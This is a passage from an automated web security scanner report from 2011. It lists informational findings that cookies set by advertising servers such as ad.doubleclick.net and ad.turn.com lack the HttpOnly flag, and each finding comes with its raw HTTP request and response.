Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUSEtGmJ_d6tEMmF6Ld72CP1yPoOsDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAF6CFI

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUelvbcSQnrAxyasYlpB02IBM3QRUDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpDNiNPOOpNlQHkG380ZDAwcQIfsZAQqZgi8xcgEpBgMwDwFMzC1tAAsyJLJyAqUYwlhYmVkAzLkdzEysIHdX2eyAmQWAwMAIV8oiw--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:31:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Length: 0
Date: Sun, 24 Apr 2011 12:31:25 GMT


18.169. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=2700844;dcnet=3973;boom=47663;sz=1x1;ord=6105494023587552?&_dc_ck=try HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=cbaa89636000051||t=1303692839|et=730|cs=3xubq1go; path=/; domain=.doubleclick.net; expires=Wed, 24 Apr 2013 00:53:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 00:53:59 GMT
Date: Mon, 25 Apr 2011 00:53:59 GMT
Server: GFE/2.0
Expires: Mon, 25 Apr 2011 00:53:59 GMT

GIF89a.............!.......,...........L..;

18.170. http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3382.dogtimemedia.comOX6462/B5304363.9

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord=0.21931676924550902? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6404
Set-Cookie: id=c51bf923600009b||t=1303663573|et=730|cs=jppc_u-3; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 16:46:13 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 16:46:13 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:46:13 GMT
Expires: Sun, 24 Apr 2011 16:46:13 GMT
Discarded: true

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Mar 09 18:59:42 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

18.171. http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5831.132349.1555557534521/B4835684.28

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=0%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord=0.2388243748997535? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5427
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 17:00:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:45:59 GMT
Expires: Sun, 24 Apr 2011 16:45:59 GMT
Discarded: true

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...

18.172. http://ad.doubleclick.net/adj/inet.hostcat/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/inet.hostcat/_default

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/inet.hostcat/_default;sz=300x250;ord=9266033005085678? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 343
Set-Cookie: id=c4d9990360000f2||t=1303646982|et=730|cs=mtzrl3ts; path=/; domain=.doubleclick.net; expires=Tue, 23 Apr 2013 12:09:42 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:09:42 GMT
Expires: Sun, 24 Apr 2011 12:09:42 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-
...[SNIP]...

18.173. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225724241;49552626;h;u=ds&sv1=120467130&sv2=2011042473&sv3=295510;%3fhttp://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
Set-Cookie: id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 19:52:53 GMT
Server: GFE/2.0
Content-Type: text/html


18.174. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_gtgz=7p9%3A0%3A1; rth=2-ljzkpb-7p9~0~1~1-; uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sun, 24 Apr 2011 19:54:51 GMT
Location: http://www.googleadservices.com/pagead/conversion/1046365390/?label=NV0xCI681gEQzon58gM&amp;guid=ON&amp;script=0
Connection: close
Set-Cookie: T_gtgz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c0mw=dlx%3A6pa4%3A1; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:54:51 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-dlx~6pa4~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:54:51 GMT; Path=/
Content-Length: 0


18.175. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdbayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=ccLvK9U7QtRdQShOfq29UyRA0hWOzjunjXltn4Ro0wLfaqaDzVRu9ZiuBStYaftY77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd0SKdPzhEKaKWeI5Yx2N7aA81RFV7Ju3REEBkpNZET3_AH03m22f6LSucPu24XFtbJoH4cOuvYUlTkCNcoKzYAk3NUPm8pwlGf5Ch1PutwrWnSvjM6YIyaPo076xrJcUNwbiSZqdEKL6qcppfxujGOl00l94DPr57wWUBTyRbAx6SFM-Ia8iW6v4r--R4cQ0vlVHWJOdM_ZTcKgFSOlW-v76c4pTy1x4tO_Sj_92V_c9l9yJcRs-_HV2FNNdqgmWKwzOueNcvo-1XmGz_MBiuXyjJSUibZ2BHh2T3FSfjGAITyiawrkOih_FdqW5ZHwRtMNQF2iyMUjVL7ttzR-BfUzv-eZrtlUUUI4c_78m_3_c5cySrnTOh9dMxUw7WE-ja_3nZQmNNcCcp3_wtIWynWBXJ7BVYb5SQq17PzxVE1C6477_djhhS3SPkBUOiwXvN2UB-mbqJWj3F9DmOa47ugri-pvt5MhqWaQjjpMBxrbP88WWl0G0-IGYzqbaILcNa3VMZDZgEWVs3Qz2BttiQfQ912etMxHez7HFbRYJQYust_BLX_n2e0dL-0aj8mixtcWuh9OwP5WPMPXscRpCIMFJd1V6hK_6XZdSXRi1-9fBCyOg31PpLP2jtWuqGVpHCpDjfslrVyDxMBDlIppEJHn4tBFuPx-iDBchd3Xj-d6mnSvjM6YIyaPo076xrJcUPFlP5zO97faJzZ1aEtSW6dEc4daKu1RR2_0SqsSvHV96fpCL8Eb_AKATM_EJjD9j33kP4Nrko0okcXRXUghtRr76c4pTy1x4tO_Sj_92V_cwkPlA1bugHQgsNwNUN2EW3vp6h1m4YoN9gfv5UHXFQ2IC2DhdDGl4eOo_AeA0QhrRR8ZQb2LnR0fR8FdQf63bxMNQF2iyMUjVL7ttzR-BfUCSUxGKV05l1cGmXYc-J8685cySrnTOh9dMxUw7WE-jawGQoklAJzdveKdvZB8xorXil4TWqZs2Fc7APxLqKkAa477_djhhS3SPkBUOiwXvP23sgE4QizgtxzDeUH6ed8ri-pvt5MhqWaQjjpMBxrbGAV0u7jnu-eT7fscIjrTHjekC0SQGeXG_xb5T35Ss4efvOlTreFo8nIhLOXDY0psSnAQFqLbCQVMKL0SHYQuupcWuh9OwP5WPMPXscRpCIME_H2_mgzLFa4hlL8c6saRH0j2kee9z_x-ARl44ojjAapDjfslrVyDxMBDlIppEJHAtEJaHH6FiwpVk1TbTCs4Pz02zxgwih1t32hJDzR2iRXwQ3_DbEzpjmCmVHD87QzadK-MzpgjJo-jTvrGslxQwHGaeF-WAjW7mJndH2YOVwnmSpuC_J3YHxfjAKmX_B04URqqaHNzgB7E6-VsRza8HA3VcuutiZOC52FKO3yoHzvpzilPLXHi079KP_3ZX9zjadLD_W4Qk25QaIl2BiwNWYjiJWk9aQzyVLZH2OXmNbKV1B7NBMN8fr3nrJxtWo7FLj2bFHEeYmREZSg8ADBFkw1AXaLIxSNUvu23NH4F9SkzNOjGWKQGeKTtJ4HtrvVzlzJKudM6H10zFTDtYT6NqjNrOxeF8jsNeArRzd1s-x6ni1qbTBwW4MUEN1JdpM3rjvv92OGFLdI-QFQ6LBe87RxY6maGdv72eHuIFUDWKyuL6m-3kyGpZpCOOkwHGtsTJv5rtLhQ6dRr4jL8-o8Q68bcUqbFMpI-C-npTlLMx1SiOGlfTWtXL36ePiOy9aUQjiE1VNrAoqhhI_BVRY4D1xa6H07A_lY8w9exxGkIgzb_uapo_3GEjtQiNCUDA8sLPlqlRXWjl7eyI_CFu0hP2ckgCGSuiZNCnk1aHQCYkCgXmHzsmMRGgA0PrWVAGQ9adK-MzpgjJo-jTvrGslxQ7m6MVSNRUpqQ2D-10cypClv9BiYngppqZAgOJPk3JR32_hjlieDEGkxFdag2l_Aoc92R9o7AwpEl_z76FPzBpnvpzilPLXHi079KP_3ZX9zDTgBGp5IRkjrCAJTV8ZVAh1hJ3Lx2jTH6Z2vbSJvJVj_wcYOmG1ekAJmxsrcnmB-BBip3t4loip6gpJE7PRXhUw1AXaLIxSNUvu23NH4F9RPZZPOeGksgK52Qk4Yl60ozlzJKudM6H10zFTDtYT6NjElSgtlUCOcJy3pQW5jN33Kfmv5vVtdGhz4fVjqsFSY2Q24GDIb9Ig_sE3JF_KtqXxT5SmcZWzceN7XXcpz3Laj1iqJAw0pRiPxGBAqA2RguFxSuIusHqs-ANeRqI2eX0-W1jQPyJ9G5swrvmSFjnv5CByYP35e21Aw1IYnm6BihTKE7NZh8XhewTjqO8PhyAWwnurw8UZTM80oyuw1nZlP-zJhZZ-Q1bjRitacbaxOVTP9qcmAVf1O57ebp5SQNZSGXGpVGHhUYdpuUFiTjAlIA6qqP3BKO_N7QLYJ3-V2JF1diQSQ1nvXkYY9WDOjGVCWFcKk0OcK1paod2fc3z9PTR76F7aRbqUZNhA6AnczEot1eKTaALu3bxsky_SF7xrqIY4uIILMFgOWc-MUVQGUh5NYki1nFLjbBW-SMmWII58FWMHxHN9h4DqRCViFvMbXDpwiPTREhuOK4UpMWBgaaKd8aPfSclggHpvcnj1rTQa547WaZ7vej-BKaHXRnSiWKGazF07-sb9WbMJcB69Uzu4XKtxm-arTbtpAldmp8flrd8Pliv5vI_mjE9mWMY8KwsEwgd20k5ELAKwe3k279Aus6b5L4_NZc9G2gsPjvykZyrZ0lJbepgbY9J6LUbR3eEBbRxGTiyMX7kM5_NYwE2eVqCLcXBoZRYALyknr3LMopBM3AO5sKxGXe66Xcf1bUBS5gLuXGklliOTAkJuZ294oTg07S25wzyY5hqce37GgssTXYn2Xq8BZZgg2HObpk1xG3bToP3rXxzkj99ob5G0iiG2c_fr_eXLG84IsFvl6CwW7WMzXN4Hy5VoXWdaDuBsa5-28Mf8id0a4QFFD8ZqHLAvGnCoQ5AOuBKm4L9PTq1WYbcqAhEgQ83H5jMT6_nHF-Y8EU68DntCrjSQhIAIJkqhLZq2eZKjN4-l1K9pctvwsmq0JVN5pjnr7Cfg7jEMAhNszr5vuhm7M1ncvWgg4Yu1PCxkrNZyc-7VV-X_mx9F_7A7hdJLrSJaQwEjFn7eCNBMEz5wEn4z2HwUeSE9GcePbxvwdOT2mw813dZLTgxswKbPWb5-ti9vvM3TUADBPX2cC3KvSE-hYOcql6PYaa2Yof4H8ZbNEXKfxVWD_EqNwcSG3SB7DIjAFUePeH61RVAavNz6UfSwJ9-LZSLv5mnE5HrFnrMAJuA2Ehz39nqEfupWDpbXsEB9HKrCY6EDv-NGLxdTyLmLO0Agh-ExB6IF4sY8Tq5KqaEWYITXkUKx3KsUe2Po5SVOIqioXp52XStQPhMwXyt2Ad5s; fc=kZobV0mv2OChfkn6NxQs5IZGf83ZoUpCw_-LIwCF6JKXj2VWkQs_pZe2x4BlBj3dlN1QdeW4zlTZ3FmFjhpKQWfGrPx0K-SOL3w7moPxVd8PpZsczLZg-X3ewhfnbE_kaq3VcZ9RZeFJ5DmVciVRNT-17uf2fQ8lD0LtIx6_Iq4; pf=NorDLowqwpEErYS1IRlXOCfhHOczs2r3pVTqk5-dp_aS04H7stKnZdMqlx3yK2bUcy-iZ5wUC35PPQSMEVdkipxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:17 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBnY-SbN8VG76c4pTy